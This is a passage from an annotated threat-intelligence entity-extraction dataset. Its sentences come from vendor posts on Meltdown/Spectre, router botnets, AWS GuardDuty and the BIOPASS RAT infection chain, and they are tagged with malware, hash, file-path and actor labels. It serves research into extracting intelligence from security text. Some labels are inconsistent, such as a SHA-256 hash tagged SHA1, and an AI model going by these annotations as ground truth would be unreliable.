and “Meltdown” (CVE-2017-5754).","entities":[{"id":48151,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":48152,"label":"vulnerability","start_offset":81,"end_offset":94},{"id":48153,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":48154,"label":"vulnerability","start_offset":53,"end_offset":60},{"id":48155,"label":"vulnerability","start_offset":101,"end_offset":109}],"relations":[{"id":388,"from_id":48154,"to_id":48151,"type":"related-to"}],"Comments":[]} -{"id":3089,"text":" Comprehensive details on both of these are available at https:\/\/meltdownattack.com.","entities":[{"id":9439,"label":"URL","start_offset":57,"end_offset":83}],"relations":[],"Comments":[]} -{"id":3090,"text":" Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.","entities":[{"id":45767,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} -{"id":3091,"text":"Security updates are continuing to be released and are expected to be released over time due to the uniquely broad nature of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3092,"text":" At the time of this writing, there are no known active attacks against any of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3093,"text":" Vulnerabilities These vulnerabilities present a unique situation because they ultimately are hardware-based vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3094,"text":"All three stem from issues in modern processors and are known to affect Intel and ARM chips.","entities":[],"relations":[],"Comments":[]} -{"id":3095,"text":"The vulnerability status of AMD chips is unclear at the time of this writing.","entities":[],"relations":[],"Comments":[]} -{"id":3096,"text":" Because these affect processors, this means that the operating systems and applications that run on top of these processors are vulnerable.","entities":[],"relations":[],"Comments":[]} -{"id":3097,"text":" Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.","entities":[],"relations":[],"Comments":[]} -{"id":3098,"text":" Until then, the makers of operating systems can (and have) released patches that make the physical-layer vulnerabilities inaccessible.","entities":[],"relations":[],"Comments":[]} -{"id":3099,"text":"For all intents and purposes, it “patches” the vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3100,"text":" Full technical details on the vulnerabilities are available at the sites referenced above.","entities":[],"relations":[],"Comments":[]} -{"id":3101,"text":"But the key point to understand about these vulnerabilities is that they are information disclosure vulnerabilities that can enable processes and applications to access information they otherwise shouldn’t be able to: user-mode applications can access privileged information in the kernel and throughout the operating system.","entities":[],"relations":[],"Comments":[]} -{"id":3102,"text":" For regular end-user systems and devices, malware and malicious scripts can use these vulnerabilities to access information like usernames, passwords and account information.","entities":[],"relations":[],"Comments":[]} -{"id":3103,"text":" For shared-hosting environments like public cloud providers, this means that one hosted customer could potentially access the information of any other customer hosted on the same hardware.","entities":[],"relations":[],"Comments":[]} -{"id":3104,"text":" Based on analysis of the vulnerabilities, an industry consensus is emerging that generic protections against attacks aimed at these vulnerabilities will be difficult, if not impossible to develop.","entities":[],"relations":[],"Comments":[]} -{"id":3105,"text":"This means that prevention against attacks will have to focus on specific malware, attacks, and hosting sites as they emerge.","entities":[],"relations":[],"Comments":[]} -{"id":3106,"text":" Risk Assessment","entities":[],"relations":[],"Comments":[]} -{"id":3107,"text":" Because these are information disclosure vulnerabilities, they don’t pose the same, immediate danger like WannaCry\/WanaCrypt0r or Petya\/NotPetya.","entities":[{"id":9496,"label":"malware","start_offset":137,"end_offset":145},{"id":9493,"label":"malware","start_offset":107,"end_offset":115},{"id":9494,"label":"malware","start_offset":116,"end_offset":127},{"id":9495,"label":"malware","start_offset":131,"end_offset":136}],"relations":[],"Comments":[]} -{"id":3108,"text":"This has more in common with the Heartbleed event of 2014.","entities":[{"id":48254,"label":"vulnerability","start_offset":33,"end_offset":43},{"id":48255,"label":"TIME","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} -{"id":3109,"text":" In terms of the severity of the vulnerabilities themselves: they are important, but not critical.","entities":[],"relations":[],"Comments":[]} -{"id":3110,"text":"They are information disclosure, not code execution, vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3111,"text":" The greatest area of risk is in shared-hosting scenarios.","entities":[],"relations":[],"Comments":[]} -{"id":3112,"text":"Fortunately, most cloud providers have already deployed security updates and those that haven’t are expected to do so shortly.","entities":[],"relations":[],"Comments":[]} -{"id":3113,"text":" For end-users and those managing networks, the greatest risk these vulnerabilities pose is exploitation by malware seeking to gather information like usernames and passwords from systems. What makes these vulnerabilities most notable from a risk assessment point of view is breadth of exposure.","entities":[],"relations":[],"Comments":[]} -{"id":3114,"text":"Since these potentially affect nearly every device with a modern processor, that means that full mitigation and remediation may not be possible.","entities":[],"relations":[],"Comments":[]} -{"id":3115,"text":"Older systems (like Windows XP) and devices (like older Android smartphones and IoT devices) will likely never receive fixes for these vulnerabilities.","entities":[{"id":48257,"label":"SOFTWARE","start_offset":56,"end_offset":63},{"id":48256,"label":"SOFTWARE","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} -{"id":3116,"text":"Calls to Action ","entities":[],"relations":[],"Comments":[]} -{"id":3117,"text":"The actions to take in response to this event are clear and simple: As always, we will continue to watch this event closely and provide any updates that we can.","entities":[],"relations":[],"Comments":[]} -{"id":3118,"text":" For information on how Palo Alto Networks products are affected by these issues, customers can see our posting on the Live Community at: https:\/\/live.paloaltonetworks.com\/t5\/Customer-Advisories\/Information-about-Meltdown-and-Spectre-findings\/ta-p\/193878\/jump-to\/first-unread-message.","entities":[{"id":48258,"label":"identity","start_offset":24,"end_offset":42},{"id":9530,"label":"URL","start_offset":138,"end_offset":283}],"relations":[],"Comments":[]} -{"id":3119,"text":" If you have any questions, please visit the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} -{"id":3120,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":3121,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":3122,"text":"In recent research, Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down.","entities":[{"id":48259,"label":"identity","start_offset":20,"end_offset":38}],"relations":[],"Comments":[]} -{"id":3123,"text":"Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} -{"id":3124,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} -{"id":3125,"text":"These attacks could affect you in two ways: What causes this kind of attack?","entities":[],"relations":[],"Comments":[]} -{"id":3126,"text":"Weak passwords and out-of-date software can both enable attackers to take complete control of your home router.","entities":[{"id":48260,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":48261,"label":"attack-pattern","start_offset":19,"end_offset":39}],"relations":[],"Comments":[]} -{"id":3127,"text":" How can I prevent it?","entities":[],"relations":[],"Comments":[]} -{"id":3128,"text":"Attackers target home routers like this by targeting default passwords and out-of-date software on the routers.","entities":[{"id":48262,"label":"attack-pattern","start_offset":53,"end_offset":70},{"id":48263,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} -{"id":3129,"text":"An easy thing you can do is restart your router once a week (typically by unplugging it).","entities":[],"relations":[],"Comments":[]} -{"id":3130,"text":"You can also stay safe by changing the password on your router and updating the software.","entities":[],"relations":[],"Comments":[]} -{"id":3131,"text":"If you’re not sure how to do this, contact your Internet Service Provider (ISP) that gave you the router for help.","entities":[],"relations":[],"Comments":[]} -{"id":3132,"text":" How does it work?","entities":[],"relations":[],"Comments":[]} -{"id":3133,"text":"When devices (in this case, the routers) are under someone else’s control like this, the collection is referred to as a “botnet”, a network (-net) of remotely controlled systems or devices (bot-).","entities":[],"relations":[],"Comments":[]} -{"id":3134,"text":"When attackers have complete control of your home router, they can install attack software that they control, turning the device into a “bot”.","entities":[],"relations":[],"Comments":[]} -{"id":3135,"text":"Attacks can make all the controlled routers in a botnet do anything they want, including sending huge amounts of data to try and bring websites down.","entities":[],"relations":[],"Comments":[]} -{"id":3136,"text":"These kinds of attacks are called “Distributed Denial of Service” or “DDoS” attacks.","entities":[{"id":48264,"label":"attack-pattern","start_offset":35,"end_offset":64},{"id":48265,"label":"attack-pattern","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} -{"id":3137,"text":"Attackers use them to take down websites for several reasons: About Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} -{"id":3138,"text":"They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":48266,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} -{"id":3139,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} -{"id":3140,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":9584,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} -{"id":3141,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":3142,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":3143,"text":"There’s a very good reason why AWS remains a leader in cloud computing.","entities":[],"relations":[],"Comments":[]} -{"id":3144,"text":"While many providers describe themselves as “customer obsessed,” few come close to our long-time partner in the lengths it goes to earn and retain the trust of its customers.","entities":[],"relations":[],"Comments":[]} -{"id":3145,"text":"AWS starts with the customer and works backwards.","entities":[{"id":48267,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":3146,"text":"That means the vast majority of its feature enhancements and new services are directly driven from their input.","entities":[],"relations":[],"Comments":[]} -{"id":3147,"text":"The latest is Amazon GuardDuty Malware Protection.","entities":[{"id":48268,"label":"SOFTWARE","start_offset":14,"end_offset":49}],"relations":[],"Comments":[]} -{"id":3148,"text":"This threat detection tool, which will work closely with Trend Micro cloud solutions, will provide another valuable layer of defense in our fight against a shared adversary.","entities":[{"id":48269,"label":"SOFTWARE","start_offset":57,"end_offset":84}],"relations":[],"Comments":[]} -{"id":3149,"text":"Shining a light on an expanding attack surface Spurred by a drive for greater cost efficiency and business agility, global organizations are migrating to the cloud in droves.","entities":[],"relations":[],"Comments":[]} -{"id":3150,"text":"Gartner predicts the worldwide market for public cloud services will reach almost $495bn this year, and grow by over 21% in 2023.","entities":[{"id":48271,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":3151,"text":"In this environment, security remains a persistent concern for cloud builders, because if not properly managed, investments can increase the digital attack surface.","entities":[],"relations":[],"Comments":[]} -{"id":3152,"text":"According to recent Trend Micro research, many global organizations are already struggling to securely manage their cloud assets.","entities":[{"id":48270,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} -{"id":3153,"text":"We found that 73% of IT and business leaders are concerned with the size of their attack surface, and 43% claim it is “spiralling out of control.”","entities":[],"relations":[],"Comments":[]} -{"id":3154,"text":"Cloud is the area where most respondents say they have least insight.","entities":[],"relations":[],"Comments":[]} -{"id":3155,"text":"They want their cloud providers to do more—for example by building enhanced detection into their systems, to complement third-party tools.","entities":[],"relations":[],"Comments":[]} -{"id":3156,"text":"That’s part of the reason why AWS built Amazon GuardDuty Malware Protection was built.","entities":[{"id":48273,"label":"SOFTWARE","start_offset":40,"end_offset":75},{"id":48272,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} -{"id":3157,"text":"This new feature is triggered by detection of known malicious signatures across the cloud network.","entities":[],"relations":[],"Comments":[]} -{"id":3158,"text":"Based on this detection, the service scans the associated Amazon EBS storage environment for malware and reports any findings to AWS Security Hub.","entities":[{"id":48274,"label":"SOFTWARE","start_offset":58,"end_offset":88},{"id":48275,"label":"SOFTWARE","start_offset":129,"end_offset":145}],"relations":[],"Comments":[]} -{"id":3159,"text":"Open APIs from here link to products like Trend Micro Cloud One to enhance existing detection and response efforts.","entities":[{"id":48276,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":48277,"label":"SOFTWARE","start_offset":42,"end_offset":63}],"relations":[],"Comments":[]} -{"id":3160,"text":"Better together Trend Micro and AWS have been working closely together for over a decade now, and this latest announcement represents another exciting stage in the journey.","entities":[{"id":48278,"label":"identity","start_offset":16,"end_offset":27},{"id":48279,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} -{"id":3161,"text":"Customers will welcome AWS native threat detection as a complement to their Trend Micro Cloud One capabilities, delivering a comprehensive range of features to secure the hybrid cloud.","entities":[{"id":48280,"label":"identity","start_offset":23,"end_offset":26},{"id":48281,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} -{"id":3162,"text":"Once they add the AWS tool to our virtual patching, vulnerability scanning, lateral movement detection, posture management and other capabilities, joint customers will have a powerful set of integrated offerings to deliver simple, all-in-one cloud security and compliance.","entities":[{"id":48282,"label":"SOFTWARE","start_offset":18,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3163,"text":"In addition, this move from AWS validates our XDR strategy, which is focused on using as many data sources as possible to enhance detection and response.","entities":[{"id":48283,"label":"identity","start_offset":28,"end_offset":31}],"relations":[],"Comments":[]} -{"id":3164,"text":"The bottom line is that security takes a village.","entities":[],"relations":[],"Comments":[]} -{"id":3165,"text":"Customers, cloud providers and security vendors have a shared responsibility to work together as the threat landscape continues to evolve.","entities":[],"relations":[],"Comments":[]} -{"id":3166,"text":"That’s what we’ll continue to do, expanding and deepening our strategic partnerships with AWS and other providers in a collective effort to make the digital world safer.","entities":[{"id":48284,"label":"identity","start_offset":90,"end_offset":93}],"relations":[],"Comments":[]} -{"id":3167,"text":" Tags Cloud | Latest News | Malware | APT & Targeted Attacks |","entities":[],"relations":[],"Comments":[]} -{"id":3168,"text":"Compliance & Risks | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":3169,"text":"We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.","entities":[{"id":48286,"label":"attack-pattern","start_offset":82,"end_offset":102},{"id":48287,"label":"attack-pattern","start_offset":126,"end_offset":150},{"id":48291,"label":"malware","start_offset":16,"end_offset":27},{"id":48285,"label":"location","start_offset":70,"end_offset":75},{"id":48289,"label":"SOFTWARE","start_offset":254,"end_offset":275},{"id":48290,"label":"identity","start_offset":41,"end_offset":66},{"id":48288,"label":"SOFTWARE","start_offset":232,"end_offset":250}],"relations":[{"id":396,"from_id":48291,"to_id":48290,"type":"targets"},{"id":397,"from_id":48290,"to_id":48285,"type":"located-at"},{"id":398,"from_id":48291,"to_id":48286,"type":"uses"},{"id":399,"from_id":48291,"to_id":48287,"type":"uses"}],"Comments":[]} -{"id":3170,"text":"Closer examination of the loader shows that it loads either a Cobalt Strike shellcode or a previously undocumented backdoor written in Python, a new type of malware that we found to be named BIOPASS RAT (remote access trojan).","entities":[{"id":48293,"label":"tools","start_offset":62,"end_offset":75},{"id":48294,"label":"SOFTWARE","start_offset":135,"end_offset":141},{"id":48292,"label":"malware","start_offset":191,"end_offset":202}],"relations":[],"Comments":[]} -{"id":3171,"text":"BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command execution.","entities":[{"id":48295,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3172,"text":"It also has the ability to compromise the private information of its victims by stealing web browser and instant messaging client data.","entities":[],"relations":[],"Comments":[]} -{"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} -{"id":3174,"text":"In addition, the attack misuses the object storage service (OSS) of Alibaba Cloud (Aliyun) to host the BIOPASS RAT Python scripts as well as to store the exfiltrated data from victims.","entities":[{"id":48300,"label":"malware","start_offset":103,"end_offset":114},{"id":48299,"label":"Infrastucture","start_offset":68,"end_offset":90}],"relations":[{"id":401,"from_id":48299,"to_id":48300,"type":"hosts"}],"Comments":[]} -{"id":3175,"text":" We consider BIOPASS RAT as still being actively developed.","entities":[{"id":48301,"label":"malware","start_offset":13,"end_offset":24}],"relations":[],"Comments":[]} -{"id":3176,"text":"For example, some markers that we discovered during our analysis refer to different versions of RAT code, such as “V2” or “BPSV3”.","entities":[],"relations":[],"Comments":[]} -{"id":3177,"text":"Many of the loaders that we found were used to load Cobalt Strike shellcode by default instead of the BIOPASS RAT malware.","entities":[{"id":48302,"label":"tools","start_offset":52,"end_offset":65},{"id":48303,"label":"malware","start_offset":102,"end_offset":113}],"relations":[],"Comments":[]} -{"id":3178,"text":"Furthermore, BIOPASS RAT also creates scheduled tasks to load the Cobalt Strike shellcode during the initialization, indicating that the malicious actor behind the attack still heavily relies on Cobalt Strike.","entities":[{"id":48304,"label":"malware","start_offset":13,"end_offset":24},{"id":48305,"label":"tools","start_offset":66,"end_offset":79},{"id":48306,"label":"tools","start_offset":195,"end_offset":208}],"relations":[{"id":402,"from_id":48304,"to_id":48305,"type":"uses"}],"Comments":[]} -{"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} -{"id":3180,"text":"In this blog entry, we will dive deeper into BIOPASS RAT with a detailed technical analysis of the infection chain, the different components of the malware, and any possible associations with Winnti.","entities":[{"id":48309,"label":"threat-actor","start_offset":192,"end_offset":198},{"id":48310,"label":"malware","start_offset":45,"end_offset":56}],"relations":[{"id":404,"from_id":48310,"to_id":48309,"type":"related-to"}],"Comments":[]} -{"id":3181,"text":" Infection chain ","entities":[],"relations":[],"Comments":[]} -{"id":3182,"text":"The initial delivery mechanism of BIOPASS RAT uses of a watering hole, a compromised website in which the malicious actors inject their custom JavaScript code to deliver malware.","entities":[{"id":48312,"label":"attack-pattern","start_offset":56,"end_offset":69},{"id":48311,"label":"malware","start_offset":34,"end_offset":45}],"relations":[{"id":405,"from_id":48311,"to_id":48312,"type":"uses"}],"Comments":[]} -{"id":3183,"text":"In most of the cases that we observed, the attackers usually place their injection script in their target’s online support chat page.","entities":[],"relations":[],"Comments":[]} -{"id":3184,"text":" Figure 1. The login panel of BIOPASS RAT Figure 2. Code showing the watering hole attack injection The injected script will try to scan the affected host by sending HTTP requests to a list of ports.","entities":[{"id":48313,"label":"malware","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} -{"id":3185,"text":"If it receives any response with an expected string from these ports, the script will stop.","entities":[],"relations":[],"Comments":[]} -{"id":3186,"text":"This step is likely designed to avoid attacking an already infected victim.","entities":[],"relations":[],"Comments":[]} -{"id":3187,"text":"We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.","entities":[{"id":48314,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} -{"id":3188,"text":"This functionality allows the script to identify whether the victim has already been infected by their malware.","entities":[],"relations":[],"Comments":[]} -{"id":3189,"text":"It conducts this identification by testing whether the port is open or not and then by checking the response. Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":3190,"text":"The script used to check for existing BIOPASS RAT infections If the script confirms that the visitor has not yet been infected, it will then replace the original page content with the attackers’ own content.","entities":[{"id":48315,"label":"malware","start_offset":38,"end_offset":49}],"relations":[],"Comments":[]} -{"id":3191,"text":"The new page will show an error message with an accompanying instruction telling website visitors to download either a Flash installer or a Silverlight installer, both of which are malicious loaders.","entities":[{"id":48317,"label":"SOFTWARE","start_offset":140,"end_offset":151},{"id":48316,"label":"SOFTWARE","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} -{"id":3192,"text":"It is important to note that both Adobe Flash and Microsoft Silverlight have already been deprecated by their respective vendors.","entities":[{"id":48318,"label":"SOFTWARE","start_offset":34,"end_offset":45},{"id":48319,"label":"SOFTWARE","start_offset":50,"end_offset":71}],"relations":[],"Comments":[]} -{"id":3193,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":3194,"text":"The fake Adobe Flash Player download page of the watering hole attack Figure 5.","entities":[{"id":48321,"label":"attack-pattern","start_offset":49,"end_offset":69},{"id":48320,"label":"SOFTWARE","start_offset":9,"end_offset":27}],"relations":[],"Comments":[]} -{"id":3195,"text":"The fake Silverlight download page of the watering hole attack Figure 6.","entities":[{"id":48322,"label":"SOFTWARE","start_offset":9,"end_offset":20},{"id":48323,"label":"attack-pattern","start_offset":42,"end_offset":62}],"relations":[],"Comments":[]} -{"id":3196,"text":"Anti-VM checks in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 Figure 7.","entities":[{"id":9775,"label":"SHA2","start_offset":25,"end_offset":89}],"relations":[],"Comments":[]} -{"id":3197,"text":"Check for zh-CN-preferred UI language in sample 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 ","entities":[{"id":9779,"label":"SHA2","start_offset":48,"end_offset":112}],"relations":[],"Comments":[]} -{"id":3198,"text":"The legitimate known application is downloaded and executed.","entities":[],"relations":[],"Comments":[]} -{"id":3199,"text":"Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers’ account.","entities":[{"id":48324,"label":"Infrastucture","start_offset":177,"end_offset":194},{"id":9783,"label":"SHA1","start_offset":94,"end_offset":158}],"relations":[{"id":406,"from_id":48324,"to_id":9783,"type":"hosts"}],"Comments":[]} -{"id":3200,"text":"Visual C++ runtime, a legitimate and signed vc_redist.x??.exe, and Python runtime are then downloaded.","entities":[{"id":48325,"label":"FILEPATH","start_offset":44,"end_offset":61},{"id":48326,"label":"SOFTWARE","start_offset":0,"end_offset":18},{"id":48327,"label":"SOFTWARE","start_offset":67,"end_offset":81}],"relations":[],"Comments":[]} -{"id":3201,"text":"These files are also hosted on Alibaba Cloud OSS on an attacker-controlled account.","entities":[{"id":48328,"label":"Infrastucture","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} -{"id":3202,"text":"The Python runtime is usually a ZIP file with all required executables, as well as the DLL and Python libraries necessary for running Python scripts on machines where Python is not installed.","entities":[{"id":48329,"label":"SOFTWARE","start_offset":4,"end_offset":10},{"id":48330,"label":"SOFTWARE","start_offset":95,"end_offset":101},{"id":48331,"label":"SOFTWARE","start_offset":134,"end_offset":140},{"id":48332,"label":"SOFTWARE","start_offset":167,"end_offset":173}],"relations":[],"Comments":[]} -{"id":3203,"text":"Scheduled tasks that are activated on a new login are created.","entities":[],"relations":[],"Comments":[]} -{"id":3204,"text":"These tasks can run a BPS backdoor or a Cobalt Strike loader.","entities":[{"id":48334,"label":"tools","start_offset":40,"end_offset":53},{"id":48333,"label":"malware","start_offset":22,"end_offset":34}],"relations":[],"Comments":[]} -{"id":3205,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":3206,"text":"Code excerpt from the scheduled task We also noticed the path string “ServiceHub”, which is a path to the extracted Python runtime.","entities":[{"id":9799,"label":"attack-pattern","start_offset":22,"end_offset":36}],"relations":[],"Comments":[]} -{"id":3207,"text":"After the hex decoding of the arguments, we get a Python one-liner that downloads additional Python scripts from the cloud.","entities":[{"id":48335,"label":"SOFTWARE","start_offset":50,"end_offset":56},{"id":48336,"label":"SOFTWARE","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} -{"id":3208,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":3209,"text":"Python code for downloading additional components from Alibaba Cloud OSS Figure 10.","entities":[{"id":48337,"label":"Infrastucture","start_offset":55,"end_offset":72}],"relations":[],"Comments":[]} -{"id":3210,"text":"The BIOPASS RAT infection flow ","entities":[{"id":9806,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3211,"text":"Examining the BIOPASS RAT modules We observed a few scheduled tasks being created, with the number dependent on the analyzed sample.","entities":[{"id":9807,"label":"malware","start_offset":14,"end_offset":25}],"relations":[],"Comments":[]} -{"id":3212,"text":"In the following section, we provide an analysis for each important backdoor module.","entities":[],"relations":[],"Comments":[]} -{"id":3213,"text":"The cdaemon module One of the modules used is called “cdaemon”.","entities":[],"relations":[],"Comments":[]} -{"id":3214,"text":"At the time of our research into this threat, only the “print(1)” command is able to be executed.","entities":[],"relations":[],"Comments":[]} -{"id":3215,"text":"An old sample of the module (30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7) is likely a watchdog to check the status of another module that is known as “c1222”. The malicious actors can change this behavior by replacing the content of the cdaemon.txt service in the cloud so that when combined with the regular execution of the scheduled task, the cdaemon task can behave like a backdoor.","entities":[{"id":48338,"label":"malware","start_offset":172,"end_offset":177},{"id":48339,"label":"FILEPATH","start_offset":259,"end_offset":270},{"id":9814,"label":"SHA2","start_offset":29,"end_offset":93},{"id":9821,"label":"attack-pattern","start_offset":348,"end_offset":362}],"relations":[{"id":407,"from_id":9814,"to_id":48338,"type":"related-to"}],"Comments":[]} -{"id":3216,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":3217,"text":"The content of the cdaemon.txt backdoor The c1222 module","entities":[{"id":48341,"label":"malware","start_offset":48,"end_offset":53},{"id":48340,"label":"FILEPATH","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} -{"id":3218,"text":"The second scheduled task is called “c1222.txt,” which is a Python code run by a previously downloaded Python runtime.","entities":[{"id":48343,"label":"SOFTWARE","start_offset":60,"end_offset":66},{"id":48344,"label":"SOFTWARE","start_offset":103,"end_offset":109},{"id":48342,"label":"FILEPATH","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} -{"id":3219,"text":"This code runs an HTTP server that listens on predefined ports.","entities":[],"relations":[],"Comments":[]} -{"id":3220,"text":"If accessed by an HTTP client, it returns a marker value.","entities":[],"relations":[],"Comments":[]} -{"id":3221,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":3222,"text":"The list of predefined ports to bind an HTTP service to, which is reversed After accessing the infected machine with an HTTP server bound to a predefined port","entities":[],"relations":[],"Comments":[]} -{"id":3223,"text":", the module returns the marker value.","entities":[],"relations":[],"Comments":[]} -{"id":3224,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} -{"id":3225,"text":"The HTTP service with marker BPSV3 We also observed other markers — such as, “cs_online”, “online”, and “dm_online”.","entities":[],"relations":[],"Comments":[]} -{"id":3226,"text":"The purpose of the HTTP service is to act as a marker for an infected machine to avoid repeated infection, as aforementioned in the infection chain section.","entities":[],"relations":[],"Comments":[]} -{"id":3227,"text":"The most important task of the c1222 script is to download, decode, and execute the Cobalt Strike shellcode.","entities":[{"id":48346,"label":"malware","start_offset":31,"end_offset":36},{"id":48345,"label":"tools","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} -{"id":3228,"text":"Based on the platform, it downloads a file with an encoded shellcode (sc3.txt, x64.txt), and then decodes it (the shellcode is base85 and hex-encoded). Figure 14. Decoding the Cobalt Strike shellcode The big module (BIOPASS RAT)","entities":[{"id":48347,"label":"FILEPATH","start_offset":70,"end_offset":77},{"id":48349,"label":"tools","start_offset":181,"end_offset":194},{"id":48348,"label":"FILEPATH","start_offset":79,"end_offset":86},{"id":9839,"label":"malware","start_offset":225,"end_offset":236}],"relations":[],"Comments":[]} -{"id":3229,"text":"The third scheduled task —is called “big.txt”— is responsible for implementing the BIOPASS RAT malware.","entities":[{"id":48350,"label":"FILEPATH","start_offset":37,"end_offset":44},{"id":9841,"label":"attack-pattern","start_offset":10,"end_offset":24},{"id":9842,"label":"malware","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} -{"id":3230,"text":"This is a Python-based backdoor that is distributed in plain text or compiled with Nuitka or PyArmor and PyInstaller.","entities":[{"id":48351,"label":"SOFTWARE","start_offset":83,"end_offset":89},{"id":48352,"label":"SOFTWARE","start_offset":93,"end_offset":100},{"id":48353,"label":"SOFTWARE","start_offset":105,"end_offset":116},{"id":48354,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3231,"text":"When the malware starts, it checks whether the file with the hard-coded name “%PUBLIC%\/20200318” exists.","entities":[{"id":48355,"label":"FILEPATH","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} -{"id":3232,"text":"This file is a marker to determine if the scheduled task of the backdoor has been installed.","entities":[],"relations":[],"Comments":[]} -{"id":3233,"text":" If the file (that is, the marker) is not found, the backdoor creates a new one and writes the current timestamp onto it.","entities":[],"relations":[],"Comments":[]} -{"id":3234,"text":"The malware will then delete the scheduled tasks added by the loader and add two new scheduled tasks that are listed in Table 1.","entities":[],"relations":[],"Comments":[]} -{"id":3235,"text":"Task Name Behavior ServiceHub Executes Python with a parameter that is the Python script to download and execute Cobalt Strike loader script “c1222” module ShellExperienceHost Executes Python with a parameter that is the Python script to download and execute BIOPASS RAT script “big” module Table 